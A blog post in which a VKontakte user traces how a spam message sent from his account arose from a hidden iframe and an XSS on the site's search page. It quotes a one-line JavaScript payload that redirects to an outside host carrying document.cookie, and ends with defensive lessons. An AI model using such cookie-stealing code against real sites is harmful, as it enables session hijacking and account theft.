How to become a spam distributor on VK because of curiosity

    Just a few minutes ago, I managed to send 200+ messages to my friends on VKontakte.
    Naturally, it was a spam message with the following content:
    hi, I’m leaving contact, Pts come a lot of spam ((now I’ll delete my page, if something is needed, then call me on my mobile phone or look for me here ... I have My page under my name. This is not spam, I am sending it to all my friends ...).

    Actually, the surprise was due to the fact that:
    1. I use Linux and only Linux wherever possible.
    2. VKontakte is used only from home, again purely from under Linux
    3. VKontakte and the mail attached to it have fairly cryptographic passwords of 10+ Latin characters and numbers. Yes, I'm paranoid.

    Attention! For your safety, I advise you to carry out all subsequent clicks on links outside this article only if you are logged out from VKontakte.

    First of all, I decided to see where this link leads to, which I sent.
    The link led to the site , which immediately redirected to
    I decided to start with the analysis of the "one-night" ones.
    Nevertheless, nothing malicious was noticed.
    “Um,” I said, and the harsh Siberian men , closed the Opera, and opened firefox.
    First of all, in the Web Developer Toolbar, I turned off the transition to META redirects and turned on Firebug for the site After making sure that I was logged out on VKontakte in Firefox, I went to the site.
    Analysis of the HTML code quickly found what was wanted: Already anticipating the answer, I typed the address and received ... 404 Apache error. Well then, you have to dig deeper. For vk-foto I turned on the Net Firebug panel, reloaded the page and began to watch what was loading: Seeing this, I cursed myself with the last words. After all, there was a reason:

    1. Not everything that looks like 404 Apache is it. You should always look at the HTTP return code
    2. When I saw "404," I did not even bother to look at its code.

    So, another iframe: Hm. But it already looks like XSS Vkontakte. External Javascript is sucked into the search page. Its contents are just like an orange: In this way, VKontakte cookies go to a third-party host. What follows from all of this:

    location.href='' + document.cookie

    1. just because you use Linux doesn't protect you from everything
    2. the cat died of curiosity - having received such a message from a friend, I went to the link, for which I paid
    3. (follows from the previous one) never follow links received from nowhere
    4. Not everything is 404 that looks like this :)
    5. Sadly, but on the old woman (VKontakte) there is a slammer.

    DISCLAIMER: I understand very well that I haven’t told anything new to information security professionals. This post is aimed more at ordinary IT-workers, and is designed to protect them from stepping on my rake

    Also popular now: